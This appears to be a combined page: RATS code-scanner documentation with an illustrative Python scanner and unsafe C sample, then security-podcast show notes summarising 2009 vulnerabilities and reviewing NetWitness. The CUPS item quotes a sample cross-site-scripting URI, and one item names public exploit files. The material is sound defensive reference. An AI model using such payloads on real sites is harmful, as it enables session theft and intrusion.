RATS requires expat to be installed in order to build and run. Expat is often installed in /usr/local/lib and /usr/local/include. On some systems, you will need to specify the --with-expat-lib and --with-expat-include options to configure so that it can find your installation of the library and header. More Info: http://expat.sourceforge.net/

 

rats [-d ] [-h] [-r] [-w ] [-x] [file1 file2 ... filen]

 

Options explained:

  • -d Specifies a vulnerability database to be loaded. You may have multiple -d options and each database specified will be loaded. 
  • -h Displays a brief usage summary 
  • -i Causes a list of function calls that were used which accept external input to be produced at the end of the vulnerability report. 
  • -l Force the specified language to be used regardless of filename extension. Currently valid language names are "c", "perl", "php" and "python". 
  • -r Causes references to vulnerable function calls that are not being used as calls themselves to be reported. 
  • -w Sets the warning level. Valid levels are 1, 2 or 3. Warning level 1 includes only default and high severity. Level 2 includes medium severity. Level 2 is the default warning level. Level 3 includes low severity vulnerabilities. 
  • -x Causes the default vulnerability databases (which are in the installation data directory, /usr/local/lib by default) to not be loaded.

When started, RATS will scan each file specified on the command line and produce a report when scanning is complete. Which vulnerabilities appear in the final report depends on the data contained in the vulnerability database or databases that are used and the warning level in use.

For each vulnerability, the list of files and line numbers where it occurred is given, followed by a brief description of the vulnerability and suggested action.
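A simplified model of the scan described above, added here as an illustration; it is not RATS's own code. The database entries, the sample C file and the names `scan` and `strip_noise` are constructed for this example, and real RATS performs more analysis than this name matching.

```python
import re
from collections import defaultdict

# Constructed mini database (not RATS's own): function -> (severity, advice)
DATABASE = {
    "strcpy": ("high", "no bounds check; use a length-limited copy"),
    "gets": ("high", "cannot be used safely; use fgets"),
    "access": ("medium", "TOCTOU: the file can change before it is opened"),
    "getenv": ("low", "environment values are external input"),
}
# Severities reported at each -w level, per the option description
LEVELS = {1: {"high"}, 2: {"high", "medium"}, 3: {"high", "medium", "low"}}
IDENT = re.compile(r"\b([A-Za-z_]\w*)\b(\s*\()?")

def strip_noise(line):
    """Blank out string literals and drop // comments before matching names."""
    line = re.sub(r'"(\\.|[^"\\])*"', '""', line)
    return line.split("//", 1)[0]

def scan(files, level=2, report_refs=False):
    """files: {name: source} -> {function: [(file, line_no, kind), ...]}."""
    findings = defaultdict(list)
    for fname, source in files.items():
        for no, line in enumerate(source.splitlines(), 1):
            for m in IDENT.finditer(strip_noise(line)):
                name, is_call = m.group(1), m.group(2) is not None
                if name not in DATABASE or DATABASE[name][0] not in LEVELS[level]:
                    continue
                if is_call or report_refs:  # like -r: also report non-call uses
                    kind = "call" if is_call else "reference"
                    findings[name].append((fname, no, kind))
    return dict(findings)

# Constructed sample input
SAMPLE = {"demo.c": '''\
void save(const char *path, const char *in) {
    char buf[16];
    char *(*copy)(char *, const char *) = strcpy;  // reference, not a call
    if (access(path, W_OK) == 0)                   // check ...
        fopen(path, "w");                          // ... then use (TOCTOU)
    strcpy(buf, in);                               // unbounded copy
    puts("gets(buf) appears only inside a string");
    getenv("HOME");
}
'''}

if __name__ == "__main__":
    for name, hits in scan(SAMPLE, level=2).items():
        print(name, DATABASE[name], hits)
```

At level 1 only the `strcpy` call is reported; level 3 adds the low-severity `getenv` call, and `report_refs=True` adds the function-pointer reference on line 3.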

ISD Episode 10

Announcements:

A quick reminder about the DC404 meeting this Saturday 2PM @ the Vortex Midtown.

Vulnerabilities of Interest:

  1. Wikipedia Toolbar Remote Code Execution Vulnerability – The Wikipedia Toolbar add-on for Firefox is prone to a remote code-execution vulnerability; fixes are available. Attackers can exploit this issue to execute arbitrary JavaScript code with chrome privileges, which may result in a compromise of the affected computer. The issue affects Wikipedia Toolbar 0.5.9; other versions may also be affected.  The vendor fixed the issue in the experimental version 0.5.9.2.
  2. Linux Kernel ‘nfs4_proc_lock()’ Local Denial of Service Vulnerability – The Linux kernel is prone to a local denial-of-service vulnerability.  Attackers can exploit this issue to cause the kernel to panic, denying service to legitimate users. Versions prior to Linux kernel 2.6.31-rc4 are vulnerable.
  3. Linux Kernel ‘pipe.c’ Local Privilege Escalation Vulnerability – Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.   Exploits are available: 36901.sh 36901.py 36901-1.c 36901-2.c. Updates are available from the vendors.
  4. CUPS ‘kerberos’ Parameter Cross Site Scripting Vulnerability – CUPS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Note: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.  This issue affects CUPS versions prior to 1.4.2.  Attackers can exploit this issue by enticing an unsuspecting victim into following a malicious URI. The following example URI is available: http://www.example.com/admin/?kerberos=onmouseover=alert
  5. Samba Oplock Break Notification Remote Denial of Service Vulnerability – Samba is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the application to consume excessive CPU resources, denying service to legitimate users. Versions prior to Samba 3.4.2, 3.3.8, 3.2.15, and 3.0.37 are vulnerable.  To exploit this issue, attackers can use readily available network utilities.
  6. Novell eDirectory Multiple Vulnerabilities – Novell eDirectory is prone to multiple buffer-overflow and denial-of-service vulnerabilities. Successful exploits may allow attackers to execute arbitrary code within the context of the affected application or cause denial-of-service conditions. These issues affect eDirectory 8.8 SP3 and 8.8 SP3 FTF3.

News Items of Interest:

Item 1: (http://www.pcworld.com/article/182180/top_5_social_engineering_exploit_techniques.html?tk=rss_news)

Item 2: (http://jeremiahgrossman.blogspot.com/2009/11/owasp-top-10-2010-release-candidate-1.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+JeremiahGrossman+%28Jeremiah+Grossman%29)

Download URL http://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf

News item 3: (http://www.phiprivacy.net/?p=1294)

News item 5: (http://www.securegoose.org/2009/11/tls-renegotiation-vulnerability-cve.html)

News item 6: (http://www.v3.co.uk/v3/news/2253269/mcafee-warns-cyber-warfare)

News item 7: (http://www.csoonline.com/article/507936/The_Botnet_Hunters_?source=rss_cso_exclude_net_net)

If you are interested in a Nepenthes VM then you can find one here: http://www.sparsa.org/drupal/?q=node/11

News item 8: (http://www.theregister.co.uk/2009/11/17/bank_of_america_skimming_plea/)

Tech Segment:

NetWitness NextGen is a comprehensive network security monitoring solution. Its uses include detecting insider threats, data leakage, malware activity, asset misuse and network anomalies, as well as compliance and network e-discovery. NetWitness provides the ability to easily correlate IP addresses in network sessions to end-user directory credentials making use of Active Directory. As a result, you can easily link compromised machines and inappropriate network behavior to a user’s actual identity.
NetWitness is a security intelligence product that audits and monitors all traffic on a network. It creates a comprehensive log of all network activities and interprets the activities into a format that network engineers and non-engineers alike can quickly understand. NetWitness INVESTIGATOR is the application you use to analyze the data captured from your network in order to identify possible internal or external threats to your security and IP infrastructure.
NetWitness converts each protocol into a common language, so knowledge of protocols is no longer needed. Performing analysis using INVESTIGATOR can be as simple as looking for user names, e-mails, applications, resources, actions, computer names.
A parser is a program, usually part of a compiler, that receives input in the form of sequential source program instructions, interactive online commands, markup tags, or some other defined interface and breaks them up into parts (for example, the nouns (objects), verbs (methods), and their attributes or options) that can then be managed by other programming (for example, other components in a compiler). A parser may also check to see that all input has been provided that is necessary.
A Collection is a logically related group of packets. It consists of one or more capture or remote device files. A collection can be created either by the live capture capability within NetWitness INVESTIGATOR, by importing existing pcap files, or by connecting to another NetWitness appliance.
So now you can create a new Collection, but you won’t see anything until you go into Edit > Options > Capture to select your adapter. At this point you can start capturing traffic for analysis.
The interesting thing with NetWitness is that you can leave it running for long periods of time and check on the status of various styles with the toggle buttons.  So when you find an item that you want to drill down into, you simply click on that address or item for more information.
  • Support for 802.11 Wireless Capture – initially supported under the portable NextGen Eagle platform, this capability will be available on all NextGen 9.0 capture platforms. This new capability supports WEP in-line decryption, and will support WPA decryption under an upcoming service pack.
  • 10 Gbps Network Support – building off of real-world experiences with massive government, commercial and service provider networks, unlike other products in this space, NextGen 9.0 includes support for both capture and real-time analysis on 10 Gbps networks.
  • Expanded authentication options – NextGen 9.0 supports Linux PAM, providing pluggable authentication modules that connect the NextGen infrastructure to customer authentication frameworks such as Kerberos for Windows and Unix environments, LDAP, Radius and many others.
  • Expanded enterprise management – NextGen 9.0 introduces a new administrative dashboard that enables comprehensive insight into global health across all connected appliances. This includes real-time feedback and charting for all system metrics, and expanded interfaces for managing configuration parameters, rules, alerts, parsers, feeds, and software updates across all devices from a single location.
  • Scriptable API – expanded support within the Software Development Kit (SDK) for C, C#, Java, Python, Perl, Ruby and .Net allowing programmers to extend the NextGen infrastructure using almost any popular language.
More information at http://www.netwitness.com
Release Date: 11/16/2009
Version: 9.0.4.3
File Size: 76.8MB
Attacker: Obviously as an attacker this tool can be used to obtain some truly sweet information that can be used to further compromise hosts.

Defender: I think this is really more of a sweet spot for this tool, but it seems that it might be more of an educational experience when you run this tool.

Upcoming Episodes:

In an upcoming Episode we will have forensics expert Scott Moulton, and Pieter Swanpoel who will provide us with a glimpse into Mainframe Security.